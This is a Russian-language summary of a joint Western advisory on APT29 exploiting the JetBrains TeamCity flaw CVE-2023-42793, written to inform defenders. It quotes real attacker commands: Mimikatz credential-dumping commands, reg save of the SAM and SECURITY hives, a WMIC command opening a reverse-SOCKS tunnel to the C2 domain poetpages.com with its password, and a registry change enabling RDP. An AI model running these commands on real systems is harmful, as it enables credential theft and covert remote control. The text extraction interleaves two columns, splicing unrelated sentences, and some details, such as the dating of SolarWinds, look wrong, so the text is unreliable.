Скачать как pdf или txt
Скачать как pdf или txt
Вы находитесь на странице: 1из 6

Больше материалов: Boosty | Sponsr | TG

программного обеспечения. Доступ может быть


использован для проведения атак на цепочки поставок,
аналогичных компрометации SolarWinds и её клиентов в
2020 году. Однако нынешняя модель эксплуатации
сосредоточена на ограниченном и «оппортунистическом
круге жертв».
II. ОСНОВНЫЕ РЕКОМЕНДАЦИИ НА ВЫНОС
• Долгосрочная угроза: обнаруженные атаки
включали кибероперации с целью кражи
конфиденциальной информации и сбора
иностранной разведывательной информации.
• Схема закрепления: в течение последнего
десятилетия были показаны схемы закрепления,
которые включают сбор разведывательной
информации о политике, экономике, военном деле,
науке и технике, а также о контрразведке.
• Spear-фишинг: действующие лица
сосредоточились spear-фишинг, нацеленной на
правительственные агентства, аналитические
центры, образовательные учреждения и
политические организации, в соответствии со целью
Аннотация – представлен анализ об уязвимости JetBrains сбора политической информации.
TeamCity, подробно описанный в публикации на сайте • Использование уязвимостей: используются
Defense.gov. Анализ посвящён различным критическим уязвимости для получения начального доступа к
аспектам кибербезопасности, в т.ч. использованию CVE для сетям с внедрением пользовательских вредоносных
получения первоначального доступа к сетям, развёртыванию программ, такие как WellMess, WellMail и Sorefang,
пользовательских вредоносных программ и последствиям для в частности, нацеленные на мед.организации и
разработчиков программного обеспечения и более широкого энергетические компании.
сообщества кибербезопасности.
• Chain-атаки: кибероперации включают в себя
Анализ служит ценным ресурсом для специалистов по атаки на цепочки поставок, о чем свидетельствует
кибербезопасности, разработчиков программного обеспечения компрометация SolarWinds в апреле 2021 года.
и заинтересованных сторон в различных отраслях, предлагая
подробное понимание тактики, методов и процедур (TTP). • Цели: технологические компании все чаще
Документ направлен на повышение уровня кибербезопасности становились целями, что позволяло проводить
организаций, позволяя защищаться от аналогичных угроз. дальнейшие кибероперации, например CVE-2023–
42793 на серверах JetBrains TeamCity.
I. ВВЕДЕНИЕ • Подготовительный этап операций: получение
Федеральное бюро расследований США (ФБР), доступа к сетям разработчиков программного
Агентство кибербезопасности и инфраструктуры США обеспечения посредством использования серверов
(CISA), Агентство национальной безопасности США TeamCity.
(АНБ), Служба военной контрразведки Польши (SKW), • Возможности для инфраструктуры C2: доступ к
CERT Polska (CERT.PL) и Национальный центр сетям технологических компаний предоставляет
кибербезопасности Великобритании (NCSC) дали участникам возможности для создания
совместную «оценку» действиям Advanced Persistent Threat инфраструктуры C2, которую трудно обнаружить.
29 (APT 29), the Dukes, CozyBear и NOBELIUM / Midnight
Blizzard, которые использовали уязвимость, III. ПЕРВОНАЧАЛЬНЫЙ ДОСТУП – ЭКСПЛУАТАЦИЯ
идентифицированную как CVE-2023-42793. Её Первоначальная тактика, используемая для получения и
эксплуатация известна с сентября 2023 года и нацелена на изучения доступа в скомпрометированной сети,
серверы, на которых размещено программное обеспечение заключалась в использовании нативных инструментов и
JetBrains TeamCity. команд, которые с меньшей вероятностью вызовут
TeamCity – это инструмент, используемый оповещения системы безопасности.
разработчиками ПО для управления и автоматизации таких • Эксплуатация CVE-2023–42793: уязвимость
задач, как компиляция, сборка, тестирование и выпуск допускает небезопасную обработку путей, позволяя
программного обеспечения. Компрометация серверов обходить авторизацию и выполнять произвольный
TeamCity приводит доступ к исходному коду разработчика, код на сервере.
подписыванию сертификатов и возможности
манипулировать процессами компиляции и развёртывания • Выполнение кода с привилегиями: эксплуатация
серверов TeamCity обычно приводила к
Больше материалов: Boosty | Sponsr | TG
выполнению кода с высокими привилегиями, инструментов или вредоносных программ, таких
обеспечивая необходимую эффективность. как EDRSandBlast.
• Эксклюзивный вектор использования: • Интерес к файлам SQL Server: известно об особом
отмечается, что не использовались другие интересе к извлечению файлов, связанных с SQL
известные векторы начального доступа. Server, установленным в скомпрометированных
системах.
IV. СБОР ИНФОРМАЦИИ ОБ ОКРУЖЕНИИ
• Файлы Visual Studio: удаление определённых
Методический подход помогает собрать полное файлов Visual Studio (VSIXAutoUpdate.exe из
представление о локальных и сетевых активностях при состава Visual Studio 2017) указывает на интерес к
сборе информации. инструментам и средам разработки. Это может быть
• Использование базовых встроенных команд: сделано с целью понимания рабочих процессов или
используется серия базовых встроенных команд для внедрения вредоносного кода в программные
выполнения «разведки» на хосте, что указывает на проекты.
эффективную скрытность за счёт использования • ПО для управления исправлениями: нацелено на
инструментов, уже имеющихся в системе. исполняемые файлы и файлы конфигурации
• Команды для получения информации о программного обеспечения для управления
пользователе и домене: такие команды, как whoami исправлениями, включая httpd.exe и httpd.conf из
/priv, whoami /all, whoami / groups и whoami /domain, каталога установки PatchManagementInstallation.
использовались для сбора подробной информации о Это предполагает заинтересованность в контроле
привилегиях пользователя, членстве в группах и инфраструктурой, потенциально для поддержания
принадлежности к домену. постоянства или предотвращения обнаружения.

• Сбор информации о сетях и служб: используются VI. ИНТЕРЕС К SQL


такие команды, как nltest -dclist, nltest -dsgetdc, Интерес к средам SQL Server в скомпрометированных
tasklist и netstat, для инвентаризации контроллеров сетях указывает на цели эксфильтрации данных, которые
домена, составления списка запущенных задач и могут обеспечить стратегическую разведку или облегчить
просмотра активных сетевых подключений. дальнейшие кибероперации.
• WMIC для составления списка процессов: WMIC • Целевые файлы SQL Server: внимание на файлах
использовались для запроса информации, DLL, связанных с Microsoft SQL Server (например,
демонстрируя интерес к мониторингу запущенных sqlmin.dll, sqllos.dll, sqllang.dll, sqltses.dll). Это
процессов и потенциальному выявлению указывает на стратегический интерес к системе
инструментов безопасности управления базами данных, потенциально для
• PowerShell для расширенных запросов: команды получения информации о структурах данных,
PowerShell использованы для выполнения более схемах или для подготовки к дальнейшей
сложных запросов, таких как получение свойств эксплуатации.
определённых учётных записей и перечисление • Использование PowerShell для сжатия:
служб и драйверов, демонстрируя возможность используется команда PowerShell Compress-Archive
использования сценариев для более глубокого для сжатия целевых DLL-файлов SQL Server в zip-
анализа. файл, расположенный по адресу
• Скрытность и обход AV: использование нативных C:\Windows\temp\1\sql.zip. Этот позволяет
инструментов и команд предполагает оперативную эффективно агрегировать и эксфильтрировать
сосредоточенность на сокрытии действий, сводя к ценные данные из скомпрометированной системы.
минимуму риск обнаружения решениями • Эксфильтрация secforwarder.dll: это действие
безопасности, которые могут выявлять подчёркивает интерес к получению подробной
инструменты сторонних производителей или информации из среды SQL Server для понимания
вредоносное ПО. механизмов безопасности или для использования
V. ЭКСФИЛЬТРАЦИЯ ДАННЫХ И ФАЙЛОВ библиотеки DLL в будущих операциях.
Стратегический подход к эксфильтрации данных даёт VII. ПРЕДОТВРАЩЕНИЕ ОБНАРУЖЕНИЯ
представление о системных конфигурациях, средах Следующая тактика демонстрирует расширенные
разработки и методах обеспечения безопасности. возможности предотвращения обнаружения и закрепления
• Целевая эксфильтрация для анализа системы: в скомпрометированных сетях, подчёркивая необходимость
эксфильтрация определённых файлов может дать надёжной и многоуровневой защиты от кибербезопасности.
подробную информацию об ОС хоста, например • Подмена драйвера: используется BYOVD-метод
C:\Windows\system32\ntoskrnl.exe. Это действие (внедрения собственного уязвимого драйвера) для
было направлено на точное определение версии отключения программного обеспечения endpoint
системы, что потенциально является необходимым detection and response (EDR) и антивирусного
условием для развёртывания определённых программного обеспечения (AV), которое
Больше материалов: Boosty | Sponsr | TG
представляет собой сложный метод подрыва • Доступ к учётным данным и сброс данных:
защиты системы. команды указывают на заинтересованность в
доступе к учётным данным и секретам и их сбросе,
• Использование EDRSandBlast: проект с открытым которые могут быть использованы для дальнейшей
исходным кодом для удаления защиты Protected компрометации сети, поддержания постоянства или
Process Light (PPL), которая предназначена для последующего перемещения в другие системы.
контроля запущенных процессов от
несанкционированного доступа или заражения. IX. ЗАКРЕПЛЕНИЕ
• Внедрение кода в процессы безопасности: для Следующие пункты подчёркивают стратегический
множества жертв код был внедрён в процессы AV / подход к установлению и поддержанию долгосрочного
EDR, что является скрытым способом избежать доступа к скомпрометированным средам с использованием
обнаружения ПО безопасности. как нативных инструментов Windows, так и передовых
• Выполнение обнаруживаемых исполняемых методов, таких как создание TGT, позволяющих сливаться
файлов в памяти: инструменты, которые обычно с обычной сетевой активностью и избегать обнаружения.
обнаруживаются программным обеспечением • Закрепление через запланированные задачи:
безопасности, такие как Mimikatz, были запущены в запланированные задачи используются для
памяти, а не на диске, чтобы избежать обнаружения. обеспечения постоянного выполнения бэкдоров в
• Сокрытие бэкдоров с помощью перехвата DLL: скомпрометированных системах.
использование уязвимостей при перехвате DLL в • Каталоги хранения исполняемых файлов: в
различных программных продуктах, включая зависимости от уровня полученных привилегий,
Zabbix и Webroot antivirus, для сокрытия бэкдора исполняемые файлы хранятся в определённых
GraphicalProton в легитимных процессах. каталогах на скомпрометированном хосте, таких как
• Резервное копирование приложения Microsoft C:\Windows\temp, C:\Windows\System32 или
vcperf: модифицированный и используемый C:\Windows\WinStore.
исходный код vcperf, приложения с открытым • Использование schtasks.exe: все изменения для
исходным кодом, разработанного Microsoft, создания запланированных задач внесены с
предназначен для удаления вредоносных библиотек использованием легитимного инструмента Windows
DLL, включая бэкдор GraphicalProton, на диск. schtasks.exe, который помогает избежать
• Каналы C2C: чтобы избежать обнаружения при подозрений и потенциального обнаружения.
мониторинге сети, установлены каналы C2C с • Rubeus Toolkit для TGTs: чтобы обеспечить
использованием облачных сервисов, таких как долгосрочный доступ, использовался Rubeus toolkit
Microsoft OneDrive и Dropbox. для создания заявок на выдачу билетов (TGT)
• Методы обфускации: обфускация используется с (T1558.001), которые являются частью протокола
целью сокрытия данных, которыми обменивается аутентификации Kerberos, используемого в средах
вредоносное ПО, внутри случайно сгенерированных Windows. Это указывает на сложный уровень атаки,
BMP-файлов, благодаря чему трафик выглядит направленной на поддержание доступа с помощью
безопасным. штатных механизмов аутентификации.

VIII. ПОВЫШЕНИЕ ПРИВИЛЕГИЙ X. ЭКСФИЛЬТРАЦИЯ КОНФИДЕНЦИАЛЬНЫХ ДАННЫХ


Следующие действия свидетельствуют о намерении Следующие моменты подчёркивают стратегический
расширить их доступ и контроль над взломанными подход к распространению данных, направленный на
системами путём получения высокоуровневых привилегий получение широкого спектра конфиденциальной
и конфиденциальной информации. информации.
• Использование Mimikatz: Mimikatz, хорошо • Удаление веток реестра Windows: специально
известный инструмент для кражи учётных данных, предназначенные и удалённые критически важные
используется для выполнения различных команд, ветки реестра Windows, включая HKLM\SYSTEM,
направленных на повышение привилегий в HKLM \ SAM и HKLM\SECURITY. Эти ветки
скомпрометированной сети. содержат конфиденциальные данные о системе,
учетной записи и конфигурации безопасности.
• Команды повышения привилегий: конкретные
выполняемые команды Mimikatz включают • Методология эксфильтрации: чтобы
privilege::debug, которая предоставляет привилегии эксфильтрировать ветки реестра Windows, он
отладки; lsadump::cache, lsadump::secrets и lsadump сохранил ветки в файлы с помощью команды reg
::sam, которые используются для сброса учётных save. Затем эти файлы были упакованы и размещены
данных и конфиденциальной информации из в каталоге C:\Windows\Temp \ с помощью
менеджера учетных записей безопасности (SAM); и PowerShell для сжатия их в zip-архив, который
sekurlsa ::logonpasswords, который извлекает из впоследствии был извлечен.
памяти текстовые пароли, хэши, PIN-коды и билеты • Использование SharpChromium для сбора
Kerberos. данных браузера: в определённых случаях
Больше материалов: Boosty | Sponsr | TG
инструмент SharpChromium используется для безопасной связи со скомпрометированными средами с
извлечения конфиденциальных данных браузера, использованием как модифицированных инструментов с
таких как файлы cookie сеанса, история посещённых открытым исходным кодом, так и штатных системных
страниц и сохранённые учётные данные для входа. утилит для уклонения от обнаружения.
Это указывает на целенаправленный подход к сбору
конкретных типов конфиденциальной информации • Использование "rr.exe" для туннелирования:
от жертв. инструмент "rr.exe" является модифицированной
версией reverse-socks-туннеля с открытым
• DSInternals: в DSInternals для взаимодействия и исходным кодом Rsockstun. Он используется для
получения информации о домене. Этот инструмент создания туннеля к их инфраструктуре C2. Этот
предоставляет возможности для доступа к данным в метод (T1572) обеспечивает безопасную и скрытую
Active Directory и управления ими, что может иметь связь между скомпрометированной средой и
решающее значение для понимания сетевой среды и инфраструктурой, контролируемой извне.
планирования дальнейших действий.
• Конкретная инфраструктура для C2: указывается
XI. СЕТЕВАЯ РАЗВЕДКА конкретная инфраструктура, используемая
Ниже раскрывается подход к проведению сетевой совместно с "rr.exe " для связи C2, включая IP-адрес
(65.20.97[.]203:443) и домен (Poetpages[.]com:8443).
разведки с использованием как нативных, так и внешних
Эта информация имеет решающее значение для
инструментов для всестороннего составления карты выявления и блокирования вредоносного трафика,
сетевого окружения жертвы и определения потенциальных связанного с этой кампанией.
целей для дальнейшей эксплуатации.
• Методы выполнения: Rsockstun выполняется
• Использование встроенных команд и двумя способами: либо непосредственно в памяти,
инструментов: для исследования сети применяется либо с помощью утилиты WMIC после переноса
комбинация встроенных команд и дополнительных инструмента на диск. Предоставленная команда
инструментов, включая сканер портов и (wmic process call create "C:\Program Files\Windows
PowerSploit, набор модулей Microsoft PowerShell, Defender Advanced Threat Protection\Sense.exe -
которые используются на различных этапах connect poetpages.com -pass M554-
тестирования на проникновение и эксплуатации. 0sddsf2@34232fsl45t31") иллюстрирует, как
• Выполненные команды PowerSploit: несколько использование штатных инструментов Windows для
команд PowerSploit выполняются для сбора выполнения вредоносной полезной нагрузки
подробной информации о сетевом окружении.:
XIII. РАСПРОСТРАНЕНИЕ
o Get-NetComputer для получения списка Следующие пункты раскрывают методы расширения и
компьютеров в текущем домене. охвата в скомпрометированной сети с использованием как
o Get-NetGroup для получения списка групп в нативных инструментов Windows, так и модификаций.
домене.
• Использование WMIC для распространения:
o Get-NetUser с различными фильтрами для WMIC используется для облегчения
отображения учётных записей пользователей и распространения в сети (T1047, T1210). Это
их атрибутов, таких как samaccountname, включает удалённое выполнение команд на других
description, pwdlastset, logoncount и узлах сети.
badpwdcount.
• Удалённое выполнение команды: WMIC (wmic
o Get-NetDiDomain и Get-ADUser для сбора /node:"<redacted>" /user:"<redacted>"
информации о домене и пользователе AD. /password:"<redacted>" process call create "rundll32
C:\Windows\system32\AclNumsInvertHost.dll
o Get-DomainUser и Get-NetUser -preauthnot
AclNumsInvertHost") указывает, что процесс
требуют идентификации конкретных учетных
выполняется удалённо и является
записей пользователей и тех, которые не
распространённым методом для распространения к
требуют предварительной аутентификации.
другим системам в скомпрометированной сети.
o Get-NetComputer | select samaccountname и Get-
NetUser -SPN | select serviceprincipalname, чтобы • Модификация ключа DisableRestrictedAdmin:
перечислить имена участников службы ключ DisableRestrictedAdmin изменён в реестре
компьютеров и пользователей. Windows для включения удалённых подключений
(T1210). Это изменение позволяет использовать
• Исполнение в памяти: дополнительные протокол RDP с отключённым режимом
инструменты, такие как PowerSploit призваны ограниченного администрирования, что может
помочь избежать обнаружения, т.к. не записывают облегчить несанкционированный доступ.
данные на диск.
• Команда изменения реестра: команда,
XII. ТУННЕЛИРОВАНИЕ В УЯЗВИМЫЕ СРЕДЫ используемая для изменения реестра (reg add
HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro
Следующие моменты подчёркивают сложное lSet\Control\Lsa /v DisableRestrictedAdmin /t
использование туннелирования для поддержания скрытой и REG_DWORD /d "0" /f) устанавливает значение
Больше материалов: Boosty | Sponsr | TG
DisableRestrictedAdmin равным "0" разрешая • Методы разведки: сбор топологии сети жертвы
удалённые подключения. (T1590.004) и информации о программном
обеспечении хоста (T1592.002) на этапе разведки
XIV. НАБОР ИНСТРУМЕНТОВ для облегчения определения цели.
Следующие пункты подчёркивают сложное • Первоначальный доступ с помощью эксплойта:
использование пользовательских инструментов и методов первоначальный доступ получен путём
для проведения киберопераций, подчёркивая их использования уязвимости (CVE-2023–42793) на
направленность на скрытность, эксфильтрацию данных и подключённых к Интернету серверах JetBrains
закрепление в скомпрометированных средах. TeamCity (T1190).
• Использование пользовательских инструментов • Выполнение с использованием PowerShell и
и инструментов с открытым исходным кодом: во командной оболочки Windows: использование
время работы TeamCity используются бэкдоры, PowerShell (T1059.001) для сжатия DLL-файлов
демонстрирующие универсальный подход к Microsoft SQL server и командной оболочки
кибероперациям. Windows (T1059.003) для выполнения разведки
• Бэкдор GraphicalProton: ключевым инструментом узла. Также используется выполнение
в их арсенале является GraphicalProton, упрощённый произвольного кода (T1203) после применения
бэкдор, который использует облачные сервисы, уязвимости TeamCity.
такие как OneDrive и Dropbox, наряду со случайно • Методы закрепления: закрепление
сгенерированными файлами BMP, для обмена поддерживается с помощью запланированных задач
данными с оператором. Этот инструмент может (T1053.005), хранимых процедур SQL (T1505.001) и
собирать важную информацию об окружающей выполнения автозапуска при загрузке или входе в
среде, такую как активные соединения TCP / UDP, систему (T1547).
запущенные процессы, а также имена
пользователей, хостов и доменов. • Повышение привилегий: используется версия
уязвимости TeamCity для повышения привилегий
• Каналы связи: OneDrive служит основным каналом (T1068) и используется метод с подменой драйвера
связи, а Dropbox – резервным. Ключи API для отключения защиты EDR и AV.
закодированы во вредоносной программе, которая
генерирует каталог с произвольным именем для • Методы предотвращения обнаружения:
хранения BMP-файлов, специфичных для используются различные методы, включая
заражения. Это имя каталога повторно обфускацию данных двоичным заполнением
рандомизируется при каждом запуске процесса (T1027.001), маскировку (T1036), внедрение
GraphicalProton. процесса (T1055), отключение или модификацию
инструментов (T1562.001) и сокрытие артефактов
• Обмен данными через BMP-файлы: процесс (T1564, T1564.001).
генерации BMP-файлов для обмена данными
включает сжатие с использованием zlib, • Доступ с учётными данными: доступ к учётным
шифрование с помощью пользовательского данным осуществляется посредством сброса
алгоритма, добавление строкового литерала к данных ОС из памяти LSASS (T1003.001) и Security
зашифрованным данным, создание случайного BMP account Manager (T1003.002), кражи учётных
и кодирование зашифрованных данных в младших данных из веб-браузеров (T1555.003) и подделки
битах пикселей. запросов Kerberos (T1558.001).
• Методы обфускации: чтобы избежать • Информационная разведка: выполнение
обнаружения, GraphicalProton «обернут слоями обнаружения владельца системы / пользователя
обфускации, шифрования, и кодировщиков». (T1033), обнаружения сетевых служб (T1046),
Известные варианты включают перехват DLL в обнаружения процессов (T1057) и сбор информации
Zabbix для выполнения, и маскирование в vcperf, о сети жертвы (T1590).
инструменте анализа сборки C++ с открытым • Распространение: достигается за счёт
исходным кодом от Microsoft. использования удалённых служб (T1210) и
• Вариант HTTPS GraphicalProton: более новый инструментария управления Windows (T1047).
вариант GraphicalProton отказывается от облачных • C2C: для управления используются динамическое
сервисов для C2 и вместо этого полагается на HTTP- взаимодействие с контролируемыми серверами
запросы, использует перерегистрированный домен с (T1568) и туннелирование протокола (T1572).
истекшим сроком действия и фиктивный сайт
WordPress для легитимизации канала C2. Его • Методы эксфильтрации: выполняется с
выполнение разделено на этап и зашифрованный использованием автоматизированных методов
двоичный файл, содержащий дополнительный код. (T1020), существующих каналов C2 (T1041) и веб-
сервисов, таких как OneDrive и Dropbox (T1567)
XV. MITRE ATT&CK
Согласно MITRE ATT&CK список воздействий
выглядит следующим образом.
Больше материалов: Boosty | Sponsr | TG
XVI. ПРЕИМУЩЕСТВА И НЕДОСТАТКИ 2023–42793), она помогает получить доступ к
исходному коду разработчиков программного
A. Преимущества предоставленных источников: обеспечения, сертификатам подписи и возможности
• Экспериментально полученная информация: нарушать процессы компиляции и развёртывания
изложенные материалы высоковероятно получены программного обеспечения. Этот доступ может
экспериментальным путём. быть использован для проведения операций по
цепочке поставок и сбора конфиденциальных
• Подробная информация: источники данных от целевых организаций.
предоставляют подробную информацию об
использующих известную уязвимость, имеющую • Постоянный долгосрочный доступ: тактика
влияние во всем мире, включая тактику, методы и повышения привилегий и развёртывание
процедуры (TTP), технические детали их работы, дополнительных бэкдоров, обеспечивает
индикаторы компрометации (IoC) и рекомендации постоянный долгосрочный доступ к
по смягчению последствий. скомпрометированным сетевым средам. Это
позволяет осуществлять постоянный сбор
• Повышение осведомлённости: цель источников – разведданных и проводить потенциальные будущие
повысить осведомлённость о вредоносной операции.
активности и помочь организациям выявлять,
защищать и смягчать потенциальные угрозы. • Предотвращение обнаружения: использование
различных методов, чтобы избежать обнаружения,
• Практические рекомендации: источники таких как использование штатных инструментов
предоставляют организациям практические Windows (например, WMIC), обфускация данных
рекомендации по повышению безопасности на двоичным заполнением и сокрытие артефактов. Эти
основе вредоносной активности. методы помогают поддерживать их присутствие в
B. Недостатки предоставленных источников: скомпрометированных сетях.
• Технический язык: источники содержат много • Расширение кибернетических возможностей:
технических терминов, которые могут оказаться нацеливаясь на технологические компании и
сложны для понимания нетехническими разработчиков программного обеспечения, ИТ-
пользователями. отдел расширяет свои кибернетические
возможности и потенциально получает доступ к
• Ограниченный охват: источники сосредоточены широкому кругу организаций за счёт взлома
конкретно использующих JetBrains TeamCity CVE. цепочки поставок.
Хотя эта информация ценна, она может не
охватывать весь спектр потенциальных киберугроз, B. Ограничения «защищаюшихся»
о которых организациям следует знать. • Раскрытие тактики, методов и процедур (TTP):
• Потенциал устаревшей информации: поскольку Подробный анализ киберактивности в рамках
ландшафт кибербезопасности постоянно совместного консультативного совета по
развивается, информация, представленная в кибербезопасности раскрывает их TTP, включая
источниках, может устареть по мере появления конкретные инструменты, вредоносное ПО и
новых уязвимостей и угроз. векторы атак. Эта информация помогает
организациям лучше защищаться от операций;
• Сосредоточьтесь на конкретных странах: однако она вынуждает разрабатывать новые TTP.
источники в первую очередь фокусируются на
воздействии уязвимости на Соединённые Штаты и • Повышение осведомлённости и средств защиты:
союзные им страны. обнародование информации об использовании
уязвимости TeamCity в JetBrains в теории повышает
XVII. ВОЗМОЖНОСТИ И ОГРАНИЧЕНИЯ СТОРОН осведомлённость организаций по всему миру. Это
может привести к увеличению количества
В то время как одна сторона получает неоспоримую исправлений и усилению защиты, что затруднит
выгоду из доступа к конфиденциальной информации, успешную компрометацию целей.
постоянного доступа к скомпрометированным сетям и
расширения своих возможностей, повышение • Последствия: результат этих киберопераций
осведомлённости и защиты среди целей, а также агентствами кибербезопасности США и союзных
сотрудничество между агентствами кибербезопасности им стран маловероятно может привести к
создают существенные недостатки в их операциях с точки политическим, экономическим или правовым
последствиям для страны, в зависимости от
зрения АНБ.
воздействия и масштаба операций.
A. Возможности «атакующих»
• Доступ к конфиденциальной информации:
Используя уязвимость JetBrains TeamCity (CVE-

Вам также может понравиться